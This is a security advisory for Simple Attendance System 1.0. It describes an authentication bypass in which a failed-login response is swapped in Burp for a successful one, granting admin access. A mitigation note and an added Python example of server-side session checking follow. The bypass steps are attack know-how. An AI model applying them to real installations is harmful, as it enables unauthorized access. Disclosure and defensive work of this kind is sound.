Vendor: Simple Attendance System
By: Abdullah Khawaja (hax.3xploit)
CVSS: 7.5 (HIGH)
Authentication Bypass
CWE: 287
Product Name: Simple Attendance System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:oretnom23:simple_attendance_system:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Windows
2021
Simple Attendance System 1.0 – Authenticated bypass
Simple Attendance System is prone to multiple vulnerabilities. An easy authentication bypass in the application allows an attacker to log in. The attacker can submit wrong credentials, capture the request in Burp, and send it to Repeater. Then the attacker can replace the response with a successful login response and forward the request. This allows the attacker to log in as admin.
Mitigation:
Ensure that authentication credentials are properly validated and that the application is not vulnerable to authentication bypass.
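One way to apply this mitigation, shown as an added example that is not part of the original advisory or the product's code: the server issues a session only after validating credentials, and the admin page checks that server-side session rather than anything the client was shown. The function names, the in-memory stores and the sample account are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

# Constructed sample data: salt, account and password are illustrative only.
_SALT = b"constructed-demo-salt"


def _hash(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, 100_000)


USERS = {"admin": _hash("correct horse battery staple")}
SESSIONS = {}  # token -> username; lives on the server only


def login(username: str, password: str):
    """Return (response_body, session_token); a token exists only on success."""
    stored = USERS.get(username)
    candidate = _hash(password)
    # Always run the comparison so unknown users take the same code path.
    matches = hmac.compare_digest(candidate, stored or b"\x00" * 32)
    if stored is None or not matches:
        return {"status": "failed"}, None
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = username
    return {"status": "success"}, token


def admin_page(token):
    """Authorize from server-side session state, never from the login response."""
    user = SESSIONS.get(token) if token else None
    if user != "admin":
        return 401, "login required"
    return 200, "admin dashboard"


def tampered_client_flow():
    """Model the advisory's scenario: wrong credentials, response body swapped."""
    body, token = login("admin", "wrong-password")
    body = {"status": "success"}  # what the client is made to see
    # No session was created, so the protected page still refuses the request.
    return body, admin_page(token)


if __name__ == "__main__":
    print(tampered_client_flow())
```

Because the rewritten response never creates an entry in `SESSIONS`, the swapped "success" body changes only what the client displays, not what the server will serve.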